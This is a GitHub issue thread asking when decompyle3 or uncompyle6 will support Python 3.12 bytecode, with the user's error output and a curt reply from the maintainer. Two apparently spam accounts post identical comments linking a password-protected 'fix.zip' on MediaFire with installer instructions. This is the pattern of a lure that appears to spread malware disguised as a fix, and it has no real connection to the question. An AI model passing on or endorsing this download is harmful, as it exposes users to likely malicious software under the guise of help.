### ISSUE TITLE
When will python3.12 be supported?

### ISSUE THREAD

**Issue by pengyanbing84** [rocky/python-uncompyle6#500]
run -----> decompyle3 main.pyc
# decompyle3 version 3.8.0
# Python bytecode 3.12.0 (3531)
# Decompiled from: Python 3.8.6 (tags/v3.8.6:db45529, Sep 23 2020, 15:52:53) [MSC v.1927 64 bit (AMD64)]
# Embedded file name: main.py
# Size of source mod 2**32: 227 bytes

Unsupported Python version, 3.12.0, for decompilation

# Unsupported bytecode in file main.pyc
# Unsupported Python version, 3.12.0, for decompilation

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rocky** [comment]
What have you tried to do to  answer this question aside from open this issue? I think there is something on StackOverflow that answers this.
